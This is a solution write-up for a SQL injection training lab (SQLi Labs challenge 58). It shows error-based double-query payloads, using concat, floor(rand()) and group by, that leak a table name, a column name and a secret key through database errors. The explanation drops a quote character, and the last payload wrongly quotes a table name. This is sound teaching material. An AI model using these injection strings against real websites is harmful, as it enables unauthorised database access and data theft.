[ Solution ] SQLi Labs : Challenge 58 [ Double Query ] [ GET ]
The 58 challenge is a double query challenge. But , the hardest part is , we got just 5 attempts !
Double query :
When the developer of the web application blocks all kind of outputs from the database , there is no escape. No matter what we query to the database , we shall be getting no response at all.
Well, but there is a workaround for this too ! ( Yeah ! ofcourse , hats-off to the Exploiters ! )
Since the database doesn't display or output any message , we need to find an alternative to it.
The only choice we got is , the error message !
We can query the database so as to produce an error , but the error would print what we want ! Interesting ? Well , let's check out how that works !
Let's try to break the query. A single does the job. Now we have to use statements embedded within , so as to get the database to output errors. This error will also output the results too.
Query :
?id=1' union select 1,count(*),concat("~",(select table_name from information_schema.tables where table_schema='challenges' ),"~",floor(rand()*5))a from information_schema.tables group by a --+
The count(*) , concat and multiple select statements , and the random function cause errors (runtime errors). But the query within gets evaluated and produces output :
Here , what got printed out is an error . But , we have got the desired output - the table name.
Rest of the steps are the same as the previous challenges.
Now that we have the table name , we need to find the column names within it.
Query :
?id=1' union select 1,count(*),concat("~",(select column_name from information_schema.columns where table_name=' THE_RANDOM_TABLE_NAME ' limit 2,1),"~",floor(rand()*5))a from information_schema.tables group by a --+
The ' limit is 2,1 ' and not ' 0,1' because the first column doesn't print anything.
We now know the name of the column where our secret key lies. So , let's go get it !
Query :
?id=1' union select 1,count(*),concat("~",(select SECRET_COLUMN_NAME from ' THE_RANDOM_TABLE_NAME ' ),"~",floor(rand()*5))a from information_schema.tables group by a --+
Submitting this , we get :
Yeah ! we have done it 5 attempts !